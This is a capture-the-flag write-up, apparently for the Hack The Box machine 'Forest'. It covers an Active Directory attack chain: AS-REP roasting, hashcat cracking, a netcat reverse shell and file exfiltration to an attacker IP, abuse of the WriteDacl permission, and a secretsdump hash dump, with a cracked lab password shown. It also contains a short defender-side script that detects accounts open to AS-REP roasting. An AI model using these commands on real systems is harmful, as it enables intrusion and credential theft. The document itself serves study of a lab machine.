
In this article you will learn the following:
- Scanning targets using nmap
- Enumerating the Windows machine
- AS-REP roasting attack on valid users
- Cracking krb5asrep hashes with hashcat
- Enumerating Active Directory via SharpHound
- Showing the result in the BloodHound tool
- Abusing the WriteDacl permission
- Stealing user hashes (LM:NT)
Nmap Scanning:
Discovered open port 139/tcp on 10.10.10.161
Discovered open port 445/tcp on 10.10.10.161
Discovered open port 53/tcp on 10.10.10.161
Discovered open port 135/tcp on 10.10.10.161
Discovered open port 464/tcp on 10.10.10.161
Discovered open port 3269/tcp on 10.10.10.161
Discovered open port 389/tcp on 10.10.10.161
Discovered open port 636/tcp on 10.10.10.161
Discovered open port 3268/tcp on 10.10.10.161
Discovered open port 593/tcp on 10.10.10.161
Discovered open port 88/tcp on 10.10.10.161
Enumeration:
- I started enumerating users using enum4linux:
enum4linux -a 10.10.10.161
- Then I enumerated users using rpcclient:
After enumerating the users, and since the Kerberos port is open, I ran the GetNPUsers.py script from the Impacket suite:
python GetNPUsers.py -dc-ip 10.10.10.161 htb.local/ -usersfile users.txt -outputfile hashes2.txt -format hashcat
I got the hashed password for user svc-alfresco:
To crack this hash I used hashcat as follows:
hashcat -m 18200 --force -a 0 hashes2.txt rockyou.txt
And now I have valid credentials: svc-alfresco:s3rvice
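As an added defender-side example (not part of the original writeup): the setting that makes this AS-REP roasting step possible is the "Do not require Kerberos preauthentication" flag (UF_DONT_REQUIRE_PREAUTH, 0x400000) in userAccountControl. The script below parses a constructed ldapsearch-style dump and lists the enabled accounts that have the flag set, which is the same set GetNPUsers.py would return a krb5asrep hash for; the sample entries and their values are assumptions, not output from the box.

```python
# userAccountControl bits, as documented by Microsoft for the attribute.
UF_ACCOUNTDISABLE = 0x0002
UF_DONT_REQUIRE_PREAUTH = 0x400000


def parse_ldap_dump(text: str) -> list:
    """Collect (sAMAccountName, userAccountControl) pairs from an ldapsearch-style
    dump. Entries are separated by blank lines; other attributes are ignored."""
    records = []
    name, uac = None, None
    for line in text.splitlines() + [""]:  # sentinel flushes the last entry
        if not line.strip():
            if name is not None and uac is not None:
                records.append((name, uac))
            name, uac = None, None
            continue
        key, _, value = line.partition(":")
        key = key.strip().lower()
        if key == "samaccountname":
            name = value.strip()
        elif key == "useraccountcontrol":
            uac = int(value.strip())
    return records


def asrep_roastable(records: list) -> list:
    """Enabled accounts with 'Do not require Kerberos preauthentication' set:
    exactly the accounts an AS-REP roast yields a krb5asrep hash for."""
    return sorted(
        name for name, uac in records
        if uac & UF_DONT_REQUIRE_PREAUTH and not uac & UF_ACCOUNTDISABLE
    )


# Constructed sample dump; values are illustrative, not output from the box.
# 66048 = NORMAL_ACCOUNT|DONT_EXPIRE_PASSWD; 4260352 adds DONT_REQUIRE_PREAUTH;
# 4260354 additionally has ACCOUNTDISABLE set, so it is not exposed.
SAMPLE_DUMP = """\
sAMAccountName: Administrator
userAccountControl: 66048

sAMAccountName: svc-alfresco
userAccountControl: 4260352

sAMAccountName: old-svc
userAccountControl: 4260354
"""

if __name__ == "__main__":
    for user in asrep_roastable(parse_ldap_dump(SAMPLE_DUMP)):
        print(f"preauth disabled on enabled account: {user}")
```

The fix for anything the script reports is to re-enable Kerberos preauthentication on that account (clear the flag) and rotate its password.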
I ran smbmap to see the shared folder permissions; nothing interesting.
Then I connected to the server using evil-winrm with these valid credentials and got the user flag:
I started enumerating Active Directory after getting a reverse shell and executing powershell.exe:
python -m SimpleHTTPServer 80
Invoke-WebRequest -Uri http://10.10.14.42/nc64.exe -OutFile "C:\m4rv3l\nc64.exe"
./nc64.exe 10.10.14.42 9091 -e powershell.exe
Installing SharpHound:
Invoke-WebRequest -Uri http://10.10.14.42/SharpHound.ps1 -OutFile "C:\m4rv3l\SharpHound.ps1"
Execute SharpHound:
. .\SharpHound.ps1
Invoke-BloodHound -CollectionMethod All -JSONFolder "c:\experiments\bloodhound"
Moving it via nc64:
nc -lvp 9092 > 20200321052509_BloodHound.zip
.\nc64.exe 10.10.14.42 9092 < 20200321052509_BloodHound.zip
NOTE: run this from cmd.exe, since PowerShell does not support the < input redirection operator.
After getting the .zip file from the box, I ran the BloodHound tool and searched for a path to administrator:
The BloodHound result shows that svc-alfresco can WriteDacl to HTB.local, which contains [email protected]
Good resource to understand the attack:
https://blog.fox-it.com/2018/04/26/escalating-privileges-with-acls-in-active-directory/
Tool:
pip install aclpwn
aclpwn -f svc-alfresco -ft user -d htb.local -s 10.10.10.161
Choosing path 0.
python secretsdump.py htb.local/svc-alfresco:s3rvice@10.10.10.161
Then I connected as administrator with the NT hash via the evil-winrm tool and got root.txt.
That's all folks 😀